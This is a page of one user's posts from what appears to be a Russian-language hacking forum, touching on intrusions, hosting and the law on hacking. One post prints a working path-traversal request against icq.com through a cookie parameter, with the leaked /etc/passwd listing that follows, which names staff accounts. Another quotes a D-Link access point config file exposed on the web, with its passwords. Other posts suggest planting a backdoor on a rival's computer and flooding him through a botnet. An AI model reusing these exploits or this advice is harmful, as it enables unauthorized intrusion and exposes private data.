Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: Пред. 1 ... 13 14 15 16 17 18 19 20 21 22 23 ... 45 След.
Взломана защита от копирования дисков HD-DVD и Blu-Ray
 
:D уже бегу работать
Нужно взломать комп недруга, имея физический доступ как иметь комп...
 
Забирай комп его и иди домой делать уроки.
замучали бомбить, замучали бомбить
 
wipf - лично для себя.
пару сотен ботов, либо локально СПРУТ, чтобы помучать кучей коннектов - для него.
Нужно взломать комп недруга, имея физический доступ как иметь комп...
 
Backdoor, дорогой. Причём кроме тривиальной функции как из методов получения скрина экрана в нём должен работать, например, метод получения хэндла контекста устройства.

P.S. хотя сейчас у вас и каникулы - отдохни, почитай книгу лучше.

Почти во всех знаменитых троях (Lamer Death к примеру) была такая опция.
За создание компьютерных вирусов в Беларуси возбуждено 19 уголовных де
 
Что вы так удивляетесь? И в Белоруссии люди VX увлекаются :)
XSS ICQ.COM, тырим ацки
 
Хех, да что там XSS, раскрытие passwd на лицо через cookie параметр :)

Цитата
GET http://icq.com:80/people/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: icq.com
Cookie: geo=7;icq_lang=../../../../../../../../etc/passwd%00.html;ps_gender=deleted;ps_age_grp=0;ps_cc=7;ps_dating_mode=0;recent_keywords_icq=%253CSearch%253E;recent_icqSearch=Search%253Eicq%253E%253Eweb%253E%253E0%253E­1166099692%253E;recent_keywords_web=%253CSearch%253E;recent_webSearch=Search%253Eweb%253E%253Eweb%253E%253E0%253E­1166099701%253E;%20expires=Fri%2C%2015%20Dec%202006%2000%3A35%3A17%20UTC;%20path=%2F;%20domain=%2Eicq%2Ecom;s_cc=true;=111-222-1933email@address.com;moreProd=AllProduct;poll_view=1;recent_searches_on=no;thumb_srch=hide
Connection: Close
Pragma: no-cache


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/bin/false
news:x:9:13:news:/var/spool/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucp:/bin/false
operator:x:11:0:operator:/root:/bin/false
games:x:12:20:games:/usr/games:/bin/false
gopher:x:13:30:gopher:/usr/lib/gopher-data:/bin/false
ftp:x:14:50:FTP User:/var/ftp:/bin/false
squid:x:23:23:Squid Cache User:/var/spool/squid:/dev/null
pvm:x:24:24::/usr/share/pvm3:/bin/bash
named:x:25:25:Bind Daemon:/var/named:/bin/false
postgres:x:26:26:PostgreSQL Server User:/var/lib/pgsql:/bin/bash
mysql:x:27:27:Mysql User:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/false
netdump:x:34:34:Network Crash Dump User:/var/crash:/bin/bash
rpm:x:37:37:Red Hat Package Manager User:/var/lib/rpm:/bin/bash
ntp:x:38:38:Network Time Protocol User:/etc/ntp:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/var/mailman:/bin/false
gdm:x:42:42:Gnome Display Manager User:/var/gdm:/bin/bash
xfs:x:43:43:X Font Server User:/etc/X11/fs:/bin/false
mailnull:x:47:47:Mail Queue User:/var/spool/mqueue:/dev/null
apache:x:48:48:Apache User:/var/www:/bin/false
wnn:x:49:49:wnn:/home/wnn:/bin/bash
smmsp:x:51:51:smmsp mail user:/var/spool/mqueue:/dev/null
tomcat:x:53:53:Tomcat User:/var/lib/tomcat:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
frontpage:x:56:56:Frontpage User:/var/www:/bin/false
piranha:x:60:60::/etc/sysconfig/ha:/dev/null
webalizer:x:67:67:Webalizer User:/var/www/html/usage:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
privoxy:x:73:73::/etc/privoxy:/bin/bash
sshd:x:74:74::/var/empty/sshd:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
cyrus:x:76:70:cyrus imap user:/var/imap:/bin/bash
pcap:x:77:77:TCPdump User:/var/arpwatch:/sbin/nologin
fax:x:78:78:mgetty fax spool user:/var/spool/fax:/sbin/nologin
nocpulse:x:79:79:nocpulse user:/etc/sysconfig/nocpulse:/bin/bash
desktop:x:80:80:desktop:/:/sbin/nologin
messagebus:x:81:81:messagebus:/:/sbin/nologin
postfix:x:82:82:postfix:/var/spool/postfix:/bin/true
majordomo:x:91:91:majordomo mailing list:/usr/lib/majordomo:/bin/bash
quagga:x:92:92:quagga:/:/sbin/nologin
dovecot:x:97:97:quagga:/usr/libexec/dovecot:/sbin/nologin
ident:x:98:98:pident user:/:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nobody:x:99:99:Nobody:/:/bin/false
aviz:Kerberos:5020:1026:Avi Zarchia:/home/shared:/bin/ksh
dixonjm:Kerberos:16464:1026:Jeannette M Dixon:/home/shared:/bin/ksh
garfield:Kerberos:1346:1026:Garfield Burke:/home/shared:/bin/ksh
gmoore:Kerberos:1512:1026:Gene Moore:/home/shared:/bin/ksh
icqadm:Kerberos:8186:1026:icqadm:/home/icqadm:/bin/ksh
icqlog:Kerberos:7664:20:icq log-pull:/home/shared:/bin/ksh
ircacct:Kerberos:15013:1693:ICQ IRC:/home/shared:/bin/ksh
jingwu:Kerberos:3017:1026:Jing Wu:/home/shared:/bin/ksh
jobi:Kerberos:13695:1026:JOBI:/home/shared:/bin/ksh
jrogers:Kerberos:4090:1026:James Rogers:/home/shared:/bin/ksh
jthomp:Kerberos:7369:1026:James Thompson:/home/shared:/bin/ksh
kate:Kerberos:679:20:Kate Stuhrke:/home/shared:/bin/ksh
lpeters:Kerberos:379:20:Les Peters:/home/shared:/bin/csh
mcope:Kerberos:5394:1026:Michael Cope:/home/shared:/bin/ksh
mdavis:Kerberos:8141:1026:Matt Davis:/home/shared:/bin/ksh
mirab:Kerberos:12787:1013:Mirab:/home/shared:/bin/false
oallen:Kerberos:1818:1026:Orlando Allen:/home/shared:/bin/csh
oliver:Kerberos:2842:1026:Oliver Morales:/home/shared:/bin/ksh
pmorgan:Kerberos:5490:1026:Paul Morgan:/home/shared:/bin/ksh
pross:Kerberos:1425:1026:Phillip Ross:/home/shared:/bin/ksh
quantum:Kerberos:229:30:Quantum:/home/quantum:/bin/ksh
regman64:Kerberos:2962:1026:Reginald Samuel:/home/shared:/bin/ksh
risrael:Kerberos:1691:1026:Robert Israel:/home/shared:/bin/ksh
sda:Kerberos:13947:1026:Scott Anderson:/home/shared:/bin/ksh
ssahai:Kerberos:9730:1026:Scot Sahai:/home/shared:/bin/ksh
taraschk:Kerberos:17630:1026:Matthew Taraschke:/home/shared:/bin/ksh
wcooper:Kerberos:2566:1026:William Cooper:/home/shared:/bin/ksh
wuts_adm:Kerberos:1160:20:WUTS Admin:/home/wuts_adm:/bin/ksh
yonit:Kerberos:12865:1026:Yonit Gruber:/home/shared:/bin/ksh
Уязвимость D-Link DWL
 
Причём здесь, вкури багтрак.

Обращение к  /cgi-bin/Intruders.cfg, который вида:

Цитата

# Copyright © 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password IntrudersTest
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.
Можно ли что-нибудь залить.
 
Chmod'ы решают.
http и https
 
Выбор протокола как правило в вашем случае обусловлен усилением безопасности при:

- авторизациях
- анализа трафика локально

и скорее всего используются сертификаты.

Если им не пользоваться, функциональность вашего проекта не изменится.
Думаю ответ ясен.  

Цитата
К одному из них есть доступ через https интерфейс посути задача

Грабьте их и собствнно копипастите вместе с сорцами на другой сайт. Либо же вам требуется метод связки как например авторизация с одного сайта и переход после логирования на другой?
посоветуйте хост
 
Цитата
можно подробнее о shared-хостинге? да и тогда стоит подумать где брать домен....
я в растеренности....

да я понимаю, что предоставляются скидки , если берёте при опр.акции хостинг и т.п. , но
это можно сделать и разграниченно. просто я к тому, что крайне мало админов заботится о разграниченности размещаемых ресурсов, что может привести к масс-дефейсингу всех сайтов локално обычным перемещением по папкам вверх-вниз.

Домен как раз можно спокойно взять у вебнеймс или ник, а хостинг - не знаю, уже давно не пользуюсь таким понятием т.к. есть собственный сервер, порекмендовал бы виртуальный выделенный.
На черный рынок попали данные 3 млн. клиентов российских банков
 
инсайдеры - инсайдеры ... )
О форумах и тупых админах, где-то тут и битрикс пробегал
 
+1 нг кидди.
посоветуйте хост
 
не правильно :) На обоих ресурсах содержатся XSS, далее - некоторое время назад пара проектов мейл.ру (например топ.мейл.ру) имело SQL-иньекции,  понятное дело что всё полученное работает только из доверенной подсети, но раскрытие данных - одна из угроз. Я не отговариваю хоститься там, так как при соблюдении опр. собственной безопасности - всё будет в порядке, остальное уже на плечах админов.

На вашем месте я бы нашёл альтернативу shared-хостингу, например VDS/VPS решения (но это не говорит, что подобное неломаемо, просто в таких случаях безопасностью на 60 процентов можете рулить вы сами) .
Взлом Wi-Fi из-под Windows, Хочу провести експеремент
 
Цитата
а он случаем сейчас не в Backtrack перешёл?

Позвольте, Аудитор - клон Кнопикса, Багтрек - Slax'овый.
Недавно вышла вторая версия Багтрека - кстати с обилием wi-fi pen.test софта
Ответственность за взлом, Ввыяснение, что есть взлом с юридической позиции
 
Цитата
Я так понял, что если мои действия причинят ущерб, то будет за что отвечать.
Я сам читал несколько публикация по данной теме, читал и статьи 272-274 УК и комментарии к ним. Но еще не совсем понятно.
Кто-нибудь обладает реальными случаями или юр. знаниями?
Так грозит ли реальная ответственность за указанные мной действия, если я скажу, что я, допустим, что удалил данные по ошибке, считая, что работаю локально с данными на моем диске и т.п? Или как можно по другому дело обставить?
Я прям хочу дело до конца довести.

Если такой особый интерес - спроси на форуме cyber-crimes.ru :)
А вообще последствия зависят от того , на кого нарвёшься )
то не спам и не письмо ..., 4ё за фигня
 
Цитата
СПАМ ОДНО ЗНАЧНО!

слитно "одно значно".
Ответственность за взлом, Ввыяснение, что есть взлом с юридической позиции
 
Для того, чтобыв нарушить закон не требутся взламывать что-либо, чтобы получить данные для логирования. Если при определённо ситуации вы используете чужие данные (будь то э-коммерц, аккаунты от почты), то степень нарушения зависит от причинённого второму лицу ущербу.

Если изменение информации (вы обнулите базу) приведёт к такой ситуации, первообладатель (владелец хоста, базы от которой у вас данные) может обратиться к компетентным органам.
defaced 10, zeroday issue ))
 
темы то какие, антифа и т.п. )
дефейсд...))))))
ФОТО и ВИДЕО КАЗНИ ХУСЕЙНА, фото
 
С рук Бушу не сойдёт эта казнь, во-первых это не его дело, этим должен был заниматься международный суд а не амерский, каким бы тираном в лицах многих людей Хусеин не был.
Бот-сети - основа киберпреступности
 
Смысл спорить, что боты существуют только под Win платформу ?)
вопрос в их максимально анализе ещё до распространения и создание условий, которые бы не позволяли им распространяться.
Страницы: Пред. 1 ... 13 14 15 16 17 18 19 20 21 22 23 ... 45 След.